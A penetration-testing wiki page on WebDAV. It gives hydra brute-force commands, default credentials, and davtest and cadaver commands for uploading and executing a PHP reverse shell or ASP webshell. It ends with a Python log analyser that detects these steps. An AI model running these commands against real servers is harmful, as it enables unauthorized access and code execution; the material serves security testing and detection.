# WebDAV

## Theory

WebDAV is a set of extensions to the Hypertext Transfer Protocol that allows user agents to collaboratively author content directly on an HTTP web server. Usually, to **connect** to a WebDAV server you will need valid **credentials**.

## Practice

{% hint style="info" %}
On Windows, users can also access and mount WebDAV shares via UNC paths, such as `\\10.37.129.2@80\example_webdav_folder`.
{% endhint %}

### Brute-force (HTTP Basic Auth)

{% tabs %}
{% tab title="hydra" %}
WebDAV usually requires valid credentials via HTTP Basic Auth. You may brute-force them using [hydra](https://github.com/vanhauser-thc/thc-hydra).

```bash
hydra -L users.txt -P passwords.txt example.domain.local http-get /webdavDirectory/
```

{% hint style="info" %}
Default credentials are **`wampp:xampp`**
{% endhint %}
{% endtab %}
{% endtabs %}

### Upload a shell

{% tabs %}
{% tab title="Davtest" %}
**Davtest** will try to upload several files with different extensions and check if the extension is executed:

```bash
# Test and cleanup
davtest -url http://example.com/davdir -auth 'user:pass' -cleanup

# Upload .txt files and try to move them to other extensions
davtest -url http://example.com/davdir -auth 'user:pass' -cleanup -move
```

If we can upload a file, e.g. a PHP file, upload the reverse shell script.

```bash
davtest -url http://example.com/davdir -auth 'user:pass' -uploadfile shell.php -uploadloc shell.php
```

Then we can navigate to <http://example.com/davdir/shell.php> to execute it.
{% endtab %}

{% tab title="Cadaver" %}
You can use this tool to **connect to the WebDAV** server and perform actions (like **upload**, **move** or **delete**) **manually**.

```bash
$ cadaver http://example.com/davdir
Username: bob
Password: 
dav:/davdir/> put /usr/share/webshells/asp/webshell.asp
```

Then we can navigate to <http://example.com/davdir/webshell.asp> to execute it.
{% endtab %}
{% endtabs %}
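
On the server side, the brute-force and upload steps above leave a recognisable trail in the access log: repeated 401s on the DAV path, a PUT/MOVE/COPY that creates a script-extension file, then a request for that file. The following Python is an added example, not from the original page or the tools it mentions; the log lines are constructed, and the `LogFormat` with `%{Destination}i` appended, the `/davdir/` prefix, the extension list and the 401 threshold are assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlparse

# Constructed sample log. Assumed Apache LogFormat (not from the page):
#   "%h %l %u %t \"%r\" %>s %b \"%{Destination}i\""
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "PROPFIND /davdir/ HTTP/1.1" 401 381 "-"
198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "GET /davdir/ HTTP/1.1" 401 381 "-"
198.51.100.7 - - [01/Jan/2024:10:00:03 +0000] "GET /davdir/ HTTP/1.1" 401 381 "-"
198.51.100.7 - bob [01/Jan/2024:10:00:04 +0000] "GET /davdir/ HTTP/1.1" 200 512 "-"
198.51.100.7 - bob [01/Jan/2024:10:00:08 +0000] "PUT /davdir/probe.txt HTTP/1.1" 201 - "-"
198.51.100.7 - bob [01/Jan/2024:10:00:09 +0000] "MOVE /davdir/probe.txt HTTP/1.1" 201 - "http://example.com/davdir/probe.php"
198.51.100.7 - bob [01/Jan/2024:10:00:10 +0000] "GET /davdir/probe.php HTTP/1.1" 200 17 "-"
203.0.113.9 - alice [01/Jan/2024:10:05:00 +0000] "PUT /davdir/notes.txt HTTP/1.1" 201 - "-"
203.0.113.9 - alice [01/Jan/2024:10:05:03 +0000] "GET /davdir/notes.txt HTTP/1.1" 200 40 "-"
"""

LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                  r'(?P<status>\d{3}) \S+ "(?P<dest>[^"]*)"')
SCRIPT_EXT = (".php", ".asp", ".aspx", ".jsp")  # extensions the server might execute

def analyze(log_text, dav_prefix="/davdir/", max_401=3):
    """Return (rule, client_ip, detail) alerts for requests under dav_prefix."""
    failures, written, alerts = Counter(), set(), []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m or not m["path"].startswith(dav_prefix):
            continue
        ip, method, status = m["ip"], m["method"], int(m["status"])
        path = m["path"].split("?")[0]
        if status == 401:
            failures[ip] += 1
            if failures[ip] == max_401:  # alert once per client
                alerts.append(("auth-failures", ip, dav_prefix))
        elif method in ("PUT", "MOVE", "COPY") and 200 <= status < 300:
            # MOVE/COPY name the new file in the Destination header, not the request line
            target = path if method == "PUT" else urlparse(m["dest"]).path
            if target.lower().endswith(SCRIPT_EXT):
                written.add(target)
                alerts.append(("script-written", ip, target))
        elif method in ("GET", "POST") and status == 200 and path in written:
            alerts.append(("uploaded-script-requested", ip, path))
    return alerts

if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```

Without the `Destination` header in the log format, the MOVE step that renames an uploaded `.txt` to a script extension is invisible in the request line alone.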

## Resources

{% embed url="<https://exploit-notes.hdks.org/exploit/web/webdav-pentesting/>" %}

{% embed url="<https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/put-method-webdav>" %}

